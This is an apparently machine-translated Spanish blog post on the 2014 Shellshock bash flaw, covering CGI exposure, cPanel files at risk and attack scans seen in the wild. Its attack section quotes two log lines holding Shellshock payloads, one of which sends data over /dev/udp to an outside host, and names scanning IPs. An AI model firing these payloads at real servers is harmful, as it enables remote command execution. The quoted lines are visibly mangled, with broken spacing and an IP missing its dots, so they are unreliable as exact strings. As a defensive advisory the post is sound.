Vulnerabilidad Bash – Shell Shock – Miles de Sitios cPanel son de Alto Riesgo

El equipo detrás del proyecto Bash (el shell más común usado en Linux) recientemente publicó un parche  para una vulnerabilidad grave que podría permitir la ejecución remota de comandos en los servidores que ejecutan versiones vulnerables bash.

Espere, ejecución remota de comandos en bash? Probablemente se esté preguntando, “¿Cómo puede alguien ejecutar remotamente comandos en el shell?”

El tema comienza con mod_cgi y cómo los servidores web interactúan con los programas CGI (que se podría escribir en Perl, PHP, Shell scripting o cualquier otro idioma). El servidor web pasa variables, de los usuarios a ellos para que puedan empezar los ataques. En términos simples, esta vulnerabilidad permite a un atacante pasar el comando a la cola de variables, ejecutados por bash.

Esto significa que si usted está utilizando mod_cgi en su servidor web y usted tiene un CGI escrito en shell script, estás en serios problemas. ¡Debes solventarlo!

Si usted tiene CGI que está escrito en otro idioma, pero está utilizando “system ()”, “(comillas invertidas)” o la ejecución de cualquier comando de la CGI, estás en serios problemas. ¡Debes solventarlo!

Si usted no sabe lo que tiene, ¡Debes solventarlo!

¿Quién es vulnerable?

Casi todos los servidores de la Internet es vulnerable a este nuevo bug (cada servidor tiene Bash). Pero no todos los sitios son en realidad explotable.

Quiero decir, quien realmente todavía use mod_cgi lugar de mod_php / fast_cgi estaría a salvo? ¿O quién escribe el CGI en shell scripting?

Los Riesgos del Usuarios de cPanel

Bueno, los usuarios de cPanel vuelcan al propio cPanel ciertos comandos o maneras de ejecución.

Cuando comenzamos a explorar nuestros sitios clientes (y en internet en general) encontramos Que alrededor de un 2.9% de todos los sitios web que escaneadas fueron vulnerables a este problema. ¿Como vimos esa vulnerabilidad? Presentaban ese fichero dentro de su propio home, /home/username/cgi-bin/

/cgi-sys/entropysearch.cgi
/cgi-sys/FormMail-clone.cgi

Cuando hablamos de millones de sitios web, 2.9% es mucho. Sólo a partir de nuestra investigación, encontramos miles de sitios web vulnerables y fácilmente comprometida.

Si utiliza cPanel, usted tiene que parchear los servidores de inmediato (o quitar estos archivos desde el servidor)!

Los ataques

Estamos viendo muchas exploraciones para esta vulnerabilidad en las redes, pero sobre todo viniendo de la seguridad de investigadores tratando de comprender la gravedad de la misma.

Hasta ahora, estas dos direcciones IP (166.78.61.142, 24251197244) están escaneando cada sitio posible, tratando de activar la vulnerabilidad.

166.78.61.142 - - [25 / Sep / 2014: 06: 28: 47 -0400] "GET / HTTP / 1.1" 200 193 "-" "() {:;}; shellshock-eco scan> /dev/udp/pwn.nixon-security.se/4444 "

24251197244 - - [25 / Sep / 2014: 07: 49: 36 -0400] "GET / HTTP / 1.1" 200 193 "-" "() {:; }; echo-e \ x22Content-Type: text / plain \ x5Cn \ x22; qqqqqqq echo "

No hemos detectado ninguna exploración masiva que busque que CGI serían vulnerables (que es donde reside el problema).

Incluso si usted está usando mod_php para la aplicación Web (como WordPress o Joomla), lo que tienes que hacer que mod_cgi seguro no está habilitado para cosas como su cpanel backend o Plesk o cualquier otra herramienta de gestión.

En unos días más vamos a ver las exploraciones y los intentos de aprovechar esta vulnerabilidad Shell Shock actuales reales.

¡Déjanos una respuesta!